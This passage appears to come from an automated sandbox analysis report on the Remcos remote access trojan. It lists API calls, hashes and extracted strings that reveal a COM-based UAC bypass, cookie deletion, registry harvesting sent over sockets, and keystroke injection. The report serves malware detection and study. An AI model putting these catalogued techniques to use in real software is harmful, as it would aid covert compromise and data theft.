                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                    • TranslateMessage.USER32(?), ref: 0041D57A
                                    • DispatchMessageA.USER32(?), ref: 0041D584
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                    • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                    • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                    • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                    • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                    • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                    • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                    • __alloca_probe_16.LIBCMT ref: 00453F6A
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                    • __alloca_probe_16.LIBCMT ref: 00454014
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                    • __freea.LIBCMT ref: 00454083
                                    • __freea.LIBCMT ref: 0045408F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 201697637-0
                                    • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                    • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                    • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                    • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • _memcmp.LIBVCRUNTIME ref: 004454A4
                                    • _free.LIBCMT ref: 00445515
                                    • _free.LIBCMT ref: 0044552E
                                    • _free.LIBCMT ref: 00445560
                                    • _free.LIBCMT ref: 00445569
                                    • _free.LIBCMT ref: 00445575
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                    • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                    • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                    • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                    • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                    • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                    • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                    • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                    • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                    • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                    • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                    • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                    • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                    APIs
                                    • SendInput.USER32 ref: 00419A25
                                    • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                    • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                      • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend$Virtual
                                    • String ID:
                                    • API String ID: 1167301434-0
                                    • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                    • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                    • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                    • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$h{D
                                    • API String ID: 2936374016-2303565833
                                    • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                    • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                    • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                    • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                    APIs
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • _free.LIBCMT ref: 00444E87
                                    • _free.LIBCMT ref: 00444E9E
                                    • _free.LIBCMT ref: 00444EBD
                                    • _free.LIBCMT ref: 00444ED8
                                    • _free.LIBCMT ref: 00444EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID: KED
                                    • API String ID: 3033488037-2133951994
                                    • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                    • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                    • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                    • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                    • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                    • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                    • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                      • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                      • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                    • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                    • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                    • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                    • __alloca_probe_16.LIBCMT ref: 00451231
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                    • __freea.LIBCMT ref: 0045129D
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                    • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                    • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                    • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                    APIs
                                      • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                      • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                      • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • _wcslen.LIBCMT ref: 0041B7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                    • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                    • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                    • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                    APIs
                                      • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                      • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                      • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                    • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                    • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                    • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                    • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                    • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                    • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                    APIs
                                      • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                    • _free.LIBCMT ref: 00450FC8
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00450FD3
                                    • _free.LIBCMT ref: 00450FDE
                                    • _free.LIBCMT ref: 00451032
                                    • _free.LIBCMT ref: 0045103D
                                    • _free.LIBCMT ref: 00451048
                                    • _free.LIBCMT ref: 00451053
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                    • int.LIBCPMT ref: 004111BE
                                      • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                      • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                    • std::_Facet_Register.LIBCPMT ref: 004111FE
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                    • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                    • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                    • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                    APIs
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                      • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                      • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                      • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                    • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                    • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                    • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                    • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                    • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                    • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                    • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                    • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe), ref: 0040760B
                                      • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                      • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                    • CoUninitialize.OLE32 ref: 00407664
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-3528393351
                                    • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                    • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                    • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                    • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                    • GetLastError.KERNEL32 ref: 0040BB22
                                    Strings
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
